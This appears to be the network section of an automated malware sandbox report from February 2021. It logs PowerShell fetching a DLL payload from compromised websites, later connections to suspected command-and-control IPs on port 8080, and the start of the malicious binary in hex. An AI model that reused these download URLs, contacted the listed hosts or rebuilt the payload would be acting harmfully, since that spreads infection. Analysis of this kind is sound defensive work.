Feb 17, 2021 22:56:47.302362919 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.302402020 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.302436113 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.302449942 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.302494049 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.302527905 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.302804947 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.455734968 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.455795050 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.455835104 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.455873966 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.455884933 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.455913067 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.455921888 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.455961943 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456006050 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456012964 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456044912 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456084013 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456096888 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456124067 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456161976 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456181049 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456202030 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456240892 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456268072 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456289053 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456336975 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456351042 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456360102 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456383944 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456423998 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456435919 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456464052 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456504107 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456509113 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456542969 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456582069 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456599951 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456629038 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456675053 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456684113 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456712961 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456752062 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456768990 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456792116 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456806898 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456829071 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456867933 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456886053 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456907988 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456955910 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.456965923 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.456999063 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457037926 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457067966 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.457078934 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457118988 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457132101 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.457156897 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457196951 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457209110 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.457233906 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457283020 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457285881 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.457324982 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457365036 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457375050 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.457442999 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457484961 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457499027 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.457523108 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457526922 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.457577944 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.457626104 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457674026 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457717896 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457782030 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457783937 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.457811117 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.457837105 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.458990097 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.760325909 CET	49168	80	192.168.2.22	166.62.10.32
Feb 17, 2021 22:56:47.760345936 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:57:25.128336906 CET	49170	80	192.168.2.22	69.38.130.14
Feb 17, 2021 22:57:28.125436068 CET	49170	80	192.168.2.22	69.38.130.14
Feb 17, 2021 22:57:35.428128958 CET	49171	8080	192.168.2.22	195.159.28.230
Feb 17, 2021 22:57:38.438060045 CET	49171	8080	192.168.2.22	195.159.28.230
Feb 17, 2021 22:57:44.444848061 CET	49171	8080	192.168.2.22	195.159.28.230
Feb 17, 2021 22:57:56.502332926 CET	49172	8080	192.168.2.22	195.159.28.230
Feb 17, 2021 22:57:59.515400887 CET	49172	8080	192.168.2.22	195.159.28.230
Feb 17, 2021 22:58:05.521740913 CET	49172	8080	192.168.2.22	195.159.28.230
Feb 17, 2021 22:58:24.291871071 CET	49173	8080	192.168.2.22	162.241.204.233
Feb 17, 2021 22:58:24.450452089 CET	8080	49173	162.241.204.233	192.168.2.22
Feb 17, 2021 22:58:24.961287022 CET	49173	8080	192.168.2.22	162.241.204.233
Feb 17, 2021 22:58:25.120008945 CET	8080	49173	162.241.204.233	192.168.2.22
Feb 17, 2021 22:58:25.632016897 CET	49173	8080	192.168.2.22	162.241.204.233
Feb 17, 2021 22:58:25.790740013 CET	8080	49173	162.241.204.233	192.168.2.22
Feb 17, 2021 22:58:25.793502092 CET	49174	8080	192.168.2.22	162.241.204.233
Feb 17, 2021 22:58:25.951462030 CET	8080	49174	162.241.204.233	192.168.2.22
Feb 17, 2021 22:58:26.452878952 CET	49174	8080	192.168.2.22	162.241.204.233
Feb 17, 2021 22:58:26.612932920 CET	8080	49174	162.241.204.233	192.168.2.22
Feb 17, 2021 22:58:27.129767895 CET	49174	8080	192.168.2.22	162.241.204.233
Feb 17, 2021 22:58:27.287915945 CET	8080	49174	162.241.204.233	192.168.2.22
Feb 17, 2021 22:58:31.780134916 CET	49175	80	192.168.2.22	115.21.224.117
Feb 17, 2021 22:58:34.790117025 CET	49175	80	192.168.2.22	115.21.224.117

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 17, 2021 22:56:40.278003931 CET	52197	53	192.168.2.22	8.8.8.8
Feb 17, 2021 22:56:40.341351032 CET	53	52197	8.8.8.8	192.168.2.22
Feb 17, 2021 22:56:42.668936968 CET	53099	53	192.168.2.22	8.8.8.8
Feb 17, 2021 22:56:43.677108049 CET	53099	53	192.168.2.22	8.8.8.8
Feb 17, 2021 22:56:44.691370010 CET	53099	53	192.168.2.22	8.8.8.8
Feb 17, 2021 22:56:44.766448975 CET	53	53099	8.8.8.8	192.168.2.22
Feb 17, 2021 22:56:45.235028028 CET	52838	53	192.168.2.22	8.8.8.8
Feb 17, 2021 22:56:45.293414116 CET	53	52838	8.8.8.8	192.168.2.22
Feb 17, 2021 22:56:45.746856928 CET	61200	53	192.168.2.22	8.8.8.8
Feb 17, 2021 22:56:45.806917906 CET	53	61200	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 17, 2021 22:56:40.278003931 CET	192.168.2.22	8.8.8.8	0x2c09	Standard query (0)	cab.mykfn.com	A (IP address)	IN (0x0001)
Feb 17, 2021 22:56:42.668936968 CET	192.168.2.22	8.8.8.8	0xd8c3	Standard query (0)	bhaktivrind.com	A (IP address)	IN (0x0001)
Feb 17, 2021 22:56:43.677108049 CET	192.168.2.22	8.8.8.8	0xd8c3	Standard query (0)	bhaktivrind.com	A (IP address)	IN (0x0001)
Feb 17, 2021 22:56:44.691370010 CET	192.168.2.22	8.8.8.8	0xd8c3	Standard query (0)	bhaktivrind.com	A (IP address)	IN (0x0001)
Feb 17, 2021 22:56:45.235028028 CET	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	vanddnabhargave.com	A (IP address)	IN (0x0001)
Feb 17, 2021 22:56:45.746856928 CET	192.168.2.22	8.8.8.8	0xad13	Standard query (0)	ie-best.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 17, 2021 22:56:40.341351032 CET	8.8.8.8	192.168.2.22	0x2c09	Name error (3)	cab.mykfn.com	none	none	A (IP address)	IN (0x0001)
Feb 17, 2021 22:56:44.766448975 CET	8.8.8.8	192.168.2.22	0xd8c3	No error (0)	bhaktivrind.com		166.62.28.130	A (IP address)	IN (0x0001)
Feb 17, 2021 22:56:45.293414116 CET	8.8.8.8	192.168.2.22	0x26d4	No error (0)	vanddnabhargave.com		166.62.10.32	A (IP address)	IN (0x0001)
Feb 17, 2021 22:56:45.806917906 CET	8.8.8.8	192.168.2.22	0xad13	No error (0)	ie-best.net		192.185.52.115	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

bhaktivrind.com

vanddnabhargave.com

ie-best.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	166.62.28.130	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Feb 17, 2021 22:56:44.993495941 CET	0	OUT	GET /cgi-bin/JBbb8/ HTTP/1.1 Host: bhaktivrind.com Connection: Keep-Alive
Feb 17, 2021 22:56:45.223210096 CET	1	IN	HTTP/1.1 500 Internal Server Error Date: Wed, 17 Feb 2021 21:56:45 GMT Server: Apache X-Powered-By: PHP/7.4.12 Upgrade: h2,h2c Connection: Upgrade, close Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	166.62.10.32	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Feb 17, 2021 22:56:45.509758949 CET	1	OUT	GET /asset/W9o/ HTTP/1.1 Host: vanddnabhargave.com Connection: Keep-Alive
Feb 17, 2021 22:56:45.737011909 CET	3	IN	HTTP/1.1 404 Not Found Date: Wed, 17 Feb 2021 21:56:45 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Length: 1699 Keep-Alive: timeout=5 Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35 20 31 37 2c 38 30 Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container text-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80
Feb 17, 2021 22:56:45.737037897 CET	3	IN	Data Raw: 20 38 32 2c 38 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 66 66 38 61 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 38 22 20 2f 3e Data Ascii: 82,80" stroke-linejoin="round" style="fill:none;stroke:#ff8a00;stroke-width:8" /> <text x="42" y="74" fill="#ff8a00" font-family="sans-serif" font-weight="900" font-size="42px">!</text> </svg> <div class="row"> <div class="col-md-1

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	192.185.52.115	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Feb 17, 2021 22:56:45.967051029 CET	4	OUT	GET /online-timer-kvhxz/ilXL/ HTTP/1.1 Host: ie-best.net Connection: Keep-Alive
Feb 17, 2021 22:56:46.499458075 CET	5	IN	HTTP/1.1 200 OK Date: Wed, 17 Feb 2021 21:56:46 GMT Server: Apache Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Wed, 17 Feb 2021 21:56:46 GMT Content-Disposition: attachment; filename="iH51Y9HC9GOPOX3.dll" Content-Transfer-Encoding: binary Set-Cookie: 602d911e69437=1613599006; expires=Wed, 17-Feb-2021 21:57:46 GMT; path=/ Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Wed, 17 Feb 2021 21:56:46 GMT Vary: Accept-Encoding Keep-Alive: timeout=5, max=75 Transfer-Encoding: chunked Content-Type: application/octet-stream Data Raw: 33 64 30 62 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 86 46 0b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 40 00 00 00 fa 04 00 00 00 00 00 50 19 00 00 00 10 00 00 00 50 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 18 c6 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 60 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 05 00 58 15 00 00 00 a0 05 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 61 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 36 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 57 00 00 00 00 50 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 04 00 00 00 60 00 00 00 04 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 14 ed 04 00 00 70 00 00 00 ee 04 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 38 00 00 64 00 00 00 00 60 05 00 00 02 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 37 00 00 64 00 00 00 00 70 05 00 00 02 00 00 00 32 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 36 00 00 64 00 00 00 00 80 05 00 00 02 00 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 35 00 00 64 00 00 00 00 90 05 00 00 02 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 e0 03 00 00 00 a0 05 00 00 04 00 00 00 38 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 3d0bMZ@!L!This program cannot be run in DOS mode.$PELF`!2@PP`d<Xa`.text68 `.rdataWP<@@.data`>@.text4pB@.text8d`0 @.text7dp2 @.text6d4 @.text5d6 @.reloc8@B
Feb 17, 2021 22:56:46.499519110 CET	7	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Feb 17, 2021 22:56:46.499558926 CET	8	IN	Data Raw: cc 55 8b ec 51 c7 45 fc 2b 02 00 00 8b 45 08 8b 40 50 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 a1 cc 63 00 10 8b 48 fc 89 4d fc 8b 55 fc 89 15 8c 63 00 10 8b 45 fc 8b e5 5d c3 cc 55 8b ec 83 ec 0c a1 00 62 00 10 89 45 f4 c7 45 f8 Data Ascii: UQE+E@P]UQcHMUcE]UbEE`MU3MUBEH3UJE@MQ3EPMAUB3MAUBEH3UJE@MQ3EPMAUB3MA
Feb 17, 2021 22:56:46.499598026 CET	9	IN	Data Raw: 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc Data Ascii: EAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAMc-chx`h(db(dJu
Feb 17, 2021 22:56:46.499635935 CET	11	IN	Data Raw: c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE*
Feb 17, 2021 22:56:46.499684095 CET	12	IN	Data Raw: 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE*
Feb 17, 2021 22:56:46.499727964 CET	14	IN	Data Raw: f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE*
Feb 17, 2021 22:56:46.499768972 CET	15	IN	Data Raw: 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE*
Feb 17, 2021 22:56:46.499809027 CET	16	IN	Data Raw: 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
Feb 17, 2021 22:56:46.499847889 CET	18	IN	Data Raw: 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
